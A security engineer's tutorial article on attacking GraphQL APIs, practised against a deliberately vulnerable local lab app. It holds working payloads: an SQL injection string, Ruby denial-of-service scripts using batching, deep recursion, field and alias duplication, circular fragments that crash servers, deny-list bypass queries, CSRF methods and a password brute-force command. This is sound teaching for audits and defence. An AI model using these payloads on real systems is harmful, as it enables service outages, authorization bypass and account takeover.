Before attacking GraphQL hands on, we need to understand what it is and how it works. That’s what we’ll see in What is GraphQL? section.
Then, I’ll introduce Security considerations and a glance of how we could abuse some features.
Next, I’ll showcase several GraphQL vulnerabilities and attacks, how they work and how to exploit them as well as illustrations with POCs.
Finally, I’ll present a few offensive tools.
What is GraphQL?
Quick history
- The development of GraphQL started in 2012 by Facebook
- Facebook publicly released GraphQL in 2015
- Formation of the GraphQL foundation the 7 November 2018 hosted by The Linux Foundation
Goals
GraphQL is a query language for APIs and query runtime engine.
It’s an alternative to API schemas like REST, SOAP, gRPC. It’s not an absolute replacement, in some cases GraphQL is better suited, in some cases REST or gRPC are. Sometimes they can coexist or GraphQl can even be used on top of another API as an abstraction layer.
GraphQL doesn’t replace:
- graph databases (Neo4j, ArangoDB, OrientDB)
- query languages (SQL, NoSQL)
- object-relational mapping (ORM) (Hibernate, CodeIgniter, SQLAlchemy, ActiveRecord)
- state management libraries (Redux, Recoil, BLoC, Riverpod)
Key information
GraphQL is available for all major languages, it officially supports JavaScript, Go, PHP, Java / Kotlin, C# / .NET, Python, Swift / Objective-C, Rust, Ruby, Elixir, Scala, Flutter, Clojure, Haskell, C / C++, Elm, OCaml / Reason, Erlang, Julia, R, Groovy, Perl, D, Ballerina.
Query result is returned in JSON.
It is both a query language and server-side API runtime.
Core concepts
- Only ask for what you need
- Get predictable results
- get many resources in a single request
- Organized in terms of types and fields, not endpoints
- Add new fields and types to a GraphQL API without impacting existing queries
- Not limited by a specific storage engine
- Real-time ready
Examples
Data description
type Project {
name: String
tagline: String
contributors: [User]
}
Query
{
project(name: "GraphQL") {
tagline
}
}
One can think of it as:
SELECT tagline FROM project where name = "GraphQL"
Answer
{
"project": {
"tagline": "A query language for APIs"
}
}
Only what you need
One only needs the hero’s name?
{
hero {
name
}
}
Just get the hero’s name.
{
"hero": {
"name": "Luke Skywalker"
}
}
One needs the hero’s name and height?
{
hero {
name
height
}
}
Get exactly that.
{
"hero": {
"name": "Luke Skywalker",
"height": 1.72
}
}
With a REST API one would probably has queried an endpoint that always returns the same field where one either has too much data or not enough.
GET /hero/0
{
"name": "Luke Skywalker",
"height": 1.72,
"mass": 77,
"address": "Galaxy du Centaure"
}
Many resources in a single request
It’s possible to query the data belonging to the user, the associated posts, and its followers in the same request.
query {
User(id: 1337) {
name
posts {
title
}
followers(last: 3) {
name
}
}
}
{
"data": {
"User": {
"name": "noraj",
"posts": [
{ "title": "From cookie flag to DA" },
{ "title": "Why you shouldn't disable IPv6" }
],
"followers": [
{ "name": "Alice" },
{ "name": "Bob" }
{ "name": "Carole" }
]
}
}
While with REST we would probably have to make three queries.
REST query n°1 to get user information.
GET /users/1337
{
"user": {
"id": 1337,
"name": "noraj",
"address": {...},
"birthday": "30/02/1979"
}
}
REST query n°2 to get user’s posts.
GET /users/1337/posts
{
"posts": [{
"id": 5542,
"title": "From cookie flag to DA",
"content": "...",
"comments": [...]
}, {
"id": 5543,
"title": "Why you shouldn't disable IPv6",
"content": "...",
"comments": [...]
}]
}
REST query n°3 to get user’s followers.
GET /users/1337/followers
{
"followers": [{
"id": 1338,
"name": "Alice",
"address": {...},
"birthday": "01/05/1979"
},{
"id": 1339,
"name": "Bob",
"address": {...},
"birthday": "15/07/1978"
},{...}]
}
In this case, usage of GraphQL over REST is optimal.
- With REST:
- 3 query
- too much data
- With GraphQL:
- 1 query
- exact data
Security considerations
DVGA
To practice the following examples, deploy DVGA – Damn Vulnerable GraphQL Application, found on OWASP VWAD, which is an intentionally vulnerable application implementing many GraphQL vulnerabilities.
Installation steps:
$ git clone https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application.git dvga && cd dvga
$ docker build -t dvga .
$ docker run -t -p 5013:5013 -e WEB_HOST=0.0.0.0 --name dvga dvga
We can define a custom local domain.
$ cat /etc/hosts | grep .test
127.0.0.2 noraj.test
In order to verify the application is running correctly, let’s make a HTTP request on the GraphQL endpoint: curl http://noraj.test:5013/graphql
.
Now let’s put in practice Escape Pentesting GraphQL 101 series.
Reconnaissance / Discovery
Doing some initial discovery steps allows:
- Understanding the limits enforced
- Determining the verbosity
- Fetching all the information possible about the architecture
Before we start: Resources
It’s advised to install a GraphQL client to ease the interaction with the endpoint. Curious people or later use can consult or bookmark the following websites to search for tools and resources related to GraphQL security.
- GraphQL IDE / Client:
- https://inventory.raw.pm/ +
graphql
- Awesome (list) GraphQL Security
1st query / most basic operation
A very simple query is to ask for __typename
, the answer will reflect the type of query we are doing.
For example for a Query
:
query {
__typename
}
{
"data": {
"__typename": "Query"
}
}
For a Mutation
:
mutation {
__typename
}
{
"data": {
"__typename": "Mutations"
}
}
Note: GraphQL mutation is the equivalent of PUT
method for REST, it is used to write or update content.
Aliases
It’s possible to use aliases either to get custom key name on the answer or to get several times the same field.
query {
title1: __typename
title2: __typename
title3: __typename
title4: __typename
title5: __typename
}
{
"data": {
"title1": "Query",
"title2": "Query",
"title3": "Query",
"title4": "Query",
"title5": "Query"
}
}
But for discovery it has other usages:
- Many alias to detect alias limit
- Very long alias name to detect character limit
Detect verbosity
We can trigger an error on purpose to detect the error verbosity of the engine.
query {
noraj
}
{
"errors": [
{
"message": "Cannot query field \"noraj\" on type \"Query\".",
"locations": [
{
"line": 2,
"column": 3
}
]
}
]
}
Introspection
With gRPC there can be Reflection enabled that allows to retrieve the prototype and list services.
Eg. with grpcurl:
# Server supports reflection
grpcurl localhost:8787 list
With GraphQL there is not such an easy thing like a magic endpoint or query to get the whole schema in one shot, but there is something similar called introspection that allows to get part of the schema depending on the complexity of the request.
Note: introspection may be enabled or disabled by default depending on the engine.
Here is a minimal example:
{
__schema {
queryType {
fields {
name
}
}
}
}
It’s possible to craft a more complex query to dump the near complete schema.
There are some "Full" introspection query to get all queries, mutations, fields, etc. This one is compatible with GraphQL Voyager.
It’s possible to judge the size of the answer by the size of the scrollbar. It’s nice to have such a complete answer, but it became too long to be read manually.
Hopefully some tools allow visualizing the schema as a graph GraphQL Voyager or GraphQL Visualizer which is more friendly for the human brain.
Field suggestion
But a basic security measure is to disable introspection, so how to get schema when it is disabled?
Then, it’s possible to abuse of error suggestions: did you mean
.
In case of error, most engine will try to suggest the correct field based on the user entry.
query {
past
}
{
"errors": [
{
"message": "Cannot query field \"past\" on type \"Query\". Did
you mean \"paste\" or \"pastes\"?",
"locations": [
{
"line": 3,
"column": 2
}
]
}
]
}
Clairvoyance allows automating the extraction of a partial schema from brute-force and abusing of field suggesting.
clairvoyance -o /tmp/dvga-schema.json http://noraj.test:5013/graphql \
# -w /usr/lib/python3.10/site-packages/clairvoyance/wordlist.txt
# /usr/share/seclists/Miscellaneous/lang-english.txt is too heavy,
# ~350k entries while default clairvoyance WL is ~10k
# english-words is ~5k entries
sudo -E wordlistctl fetch -d english-words
clairvoyance -o /tmp/dvga-schema.json http://noraj.test:5013/graphql \
-w /usr/share/wordlists/misc/english-words.10.txt
# /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt
# is ~38k and full of garbage
# else build a custom wordlist
Finding paths
graphql-path-enum lists the different ways of reaching a given type in a GraphQL schema. It can allow finding an indirect path to an object to bypass restrictions.
$ graphql-path-enum -i /tmp/introspection-response.json -t OwnerObject
Found 3 ways to reach the "OwnerObject" node:
- Query (pastes) -> PasteObject (owner) -> OwnerObject
- Query (paste) -> PasteObject (owner) -> OwnerObject
- Query (readAndBurn) -> PasteObject (owner) -> OwnerObject
Fingerprinting
Often the GraphQL endpoint will be /graphql
or /v1/graphql
. It’s generally not hard to find but else it’s possible to try detecting the endpoint with graphw00f.
$ graphw00f -d -t http://noraj.test:5013
[*] Checking http://noraj.test:5013/
[*] Checking http://noraj.test:5013/graphql
[!] Found GraphQL at http://noraj.test:5013/graphql
Identifying GraphQL engine.
$ graphw00f -f -t http://noraj.test:5013/graphql
[*] Checking if GraphQL is available at http://noraj.test:5013/graphql...
[!] Found GraphQL.
[*] Attempting to fingerprint...
[*] Discovered GraphQL Engine: (Graphene)
[!] Attack Surface Matrix: https://github.com/nicholasaleks/graphql-threat-matrix/blob/master/implementations/graphene.md
[!] Technologies: Python
[!] Homepage: https://graphene-python.org
[*] Completed.
Here graphw00f
identified grapheme
engine:
Vulnerabilities
Multipath Evaluation
As an example, take the schema of DVGA, imagine the access to character object is blocked.
Five locations have to be blocked as well:
character
querycharacters
queryresults
field of thecharacters
objectresident
field of theLocation
objectcharacters
field of theEpisode
object
It’s prone to error, if one place is forgotten…
For example, for a website, one is not authorized to view other users’ info (client
object) but can access the client
field of the comments
object. It allows an authorization bypass.
SQL injection
GraphQL API often fetch data from a DB.
Where to inject in order to detect a SQLi?
The only injectable inputs are Arguments. One can think of it as a SQL WHERE
statement.
query {
user(name: "' or 1=1 --") {
id
email
}
}
Denial of Service – Batch Query Attack (JSON array)
- Find a query that take a long time to execute
- Batch it!
GraphQL query:
{
systemUpdate
}
For example in DVGA, systemUpdate
takes about 30 seconds to execute.
HTTP request:
POST /graphql HTTP/1.1
...
Content-Type: application/json
{"query":"{\n\tsystemUpdate\n}"}
The concept is to send several queries in the same request.
Most GraphQL client don’t support batch query, they often have a mode to select one or another but won’t send both on the HTTP JSON. So one has to craft the HTTP request themself.
Ruby PoC for batch querying:
require 'httpx'
data = Array.new(3) {
{ 'query' => 'query { systemUpdate }'}
}
HTTPX
.plugin(:proxy)
.with_proxy(uri: 'http://127.0.0.1:8080')
.with(timeout: { operation_timeout: 120 })
.post('http://noraj.test:5013/graphql', json: data)
The PoC does:
- query 3 times
systemUpdate
- send over the proxy for Burp logging
- extend timeout (default 60sec) because
systemUpdate
takes ~32 sec and the PoC is querying it 3 times, so it will take ~ 90 sec
The HTTP request body will look like:
[
{
"query": "query { systemUpdate }"
},
{
"query": "query { systemUpdate }"
},
{
"query": "query { systemUpdate }"
}
]
Denial of Service – Deep recursion query attack
This attack is possible when there is a circular reference.
The paste object can have an owner field and the owner object can have a paste field. The idea is just to nest them deeply.
Writing the query by hand becomes quickly laborious, so scripting it is highly valuable.
Ruby PoC for deep recursion:
require 'httpx'
nesting_level = 10
recursion_pattern = 'pastes{owner{'
fields = 'name'
payload = recursion_pattern * nesting_level + fields + '}}' * nesting_level
data = { 'query' => "query{#{payload}}"}
HTTPX
.plugin(:proxy)
.with_proxy(uri: 'http://127.0.0.1:8080')
.with(timeout: { operation_timeout: 120 })
.post('http://noraj.test:5013/graphql', json: data)
Denial of Service – Field duplication attack
As the title suggests, the attack concept is to duplicate many times the same field.
query {
pastes {
ipAddr # 1
ipAddr # 2
# ...
ipAddr # 1000
}
}
Unlike the two previous attacks, it’s not consuming time exponentially so several thousands fields are required to make the server hang significantly.
Ruby PoC for field duplication:
require 'httpx'
copy_level = 6000
copy_pattern = 'ipAddr,'
payload = copy_pattern * copy_level
data = { 'query' => "query{pastes{#{payload}}}"}
HTTPX
.plugin(:proxy)
.with_proxy(uri: 'http://127.0.0.1:8080')
.with(timeout: { operation_timeout: 120 })
.post('http://noraj.test:5013/graphql', json: data)
Denial of Service – Query aliases duplication attack
It’s an alternative the batch query attack when batching is disabled or not supported by the engine. Instead of creating several queries calling the same method, it uses only one query but use aliases to be able to call several times the same method.
query {
q1: systemUpdate
q2: systemUpdate
q3: systemUpdate
}
Ruby PoC for query aliases duplication:
require 'httpx'
copy_level = 3
query = 'systemUpdate'
payload = (1..copy_level).map { |i| "q#{i}:#{query}" }.join(',')
data = { 'query' => "query{#{payload}}"}
HTTPX
.plugin(:proxy)
.with_proxy(uri: 'http://127.0.0.1:8080')
.with(timeout: { operation_timeout: 120 })
.post('http://noraj.test:5013/graphql', json: data)
Denial of Service – Circular fragments attack
The Spread operator (...
) allows reusing fragments. It’s like a mixin.
Example of legitimate use:
fragment smallPaste on PasteObject {
id
title
content
}
query allPastes {
pastes {
...smallPaste
}
}
query allPastesWithStatus {
pastes {
public
...smallPaste
}
}
It’s easy to create an infinite loop by having two fragments call each other.
fragment noraj on PasteObject {
title
content
...jaron
}
fragment jaron on PasteObject {
content
title
...noraj
}
query {
...noraj
}
PS: the query may not even be needed.
Warning: use with caution during audits because on some engines it make it crash instantly, it’s the most effective technique.
Query whitelist/blacklist bypass
Take the following direct query to systemHealth
:
query {
systemHealth
}
This query is protected and reserved for privileged users.
{
"errors": [
{
"message": "400 Bad Request: Query is on the Deny List.",
"locations": [
{
"line": 2,
"column": 2
}
],
"path": [
"systemHealth"
]
}
],
"data": {
"systemHealth": null
}
}
Sometimes just using a query with a different operation name can work.
query random {
systemHealth
}
If not a similar error is returned:
{
"errors": [
{
"message": "400 Bad Request: Operation Name \"random\" is not allowed.",
"locations": [
{
"line": 2,
"column": 2
}
],
"path": [
"systemHealth"
]
}
],
"data": {
"systemHealth": null
}
}
This technique allows bypassing blacklists but not whitelists.
To bypass a (poorly written) whitelist, use a query with allowed operation name:
query getPastes {
systemHealth
}
{
"data": {
"systemHealth": "System Load: 2.54\n"
}
}
In some cases, a simple alias too could bypass filters.
query {
bypass: systemHealth
}
CSRF – POST-based
A common misconception is that JSON based API are not vulnerable to CSRF.
But in fact it works all the same.
Create a classic CSRF form and convert form data to JSON at submit with JavaScript and use application/json
as content type as it’s probably the only accepted Content-Type
by the GraphQL engine. More occasionally, due to middleware, some endpoint may accept application/x-www-form-urlencoded
as well.
Another option is to prepare a full JSON query in JavaScript and auto-submit it with fetch()
or XHR
.
Note : of course, CSRF are mostly useful for mutations.
CSRF – GET-based
Misconfigured GraphiQL can authorize mutations over GET request so the CSRF is as easy as URL-encoding the while query and putting the URL in an image or an iframe.
As queries are normally non-state changing, they are often authorized over GET, but if a state-changing GraphQL operation is misplaced in a query instead of a mutation, then it could be authorized over GET.
Tools
graphql-cop is a GraphQL vulnerability scanner.
CrackQL is a GraphQL password brute-force and fuzzing utility with the following features:
- Defense evasion: evades traditional API HTTP rate-limit and query cost analysis defenses
- Generic fuzzing (intruder like but benefits from defense evasion)
mutation {
login(username: {{username|str}}, password: {{password|str}}) {
accessToken
}
}
crackql -t http://noraj.test:5013/graphql -q login.graphql -i usernames_and_passwords.csv
GraphQLmap is a scripting engine to interact with a GraphQL endpoint notably for:
- field fuzzing
- NoSQLi / SQLi
GraphQL Threat Matrix is a resource that list the differences in how GraphQL implementations interpret and conform to the GraphQL specification.
InQL is a CLI tool and Burp extension for GraphQL.
About the author
Article written by Alexandre ZANNI aka noraj, Penetration Testing Engineer at ACCEIS.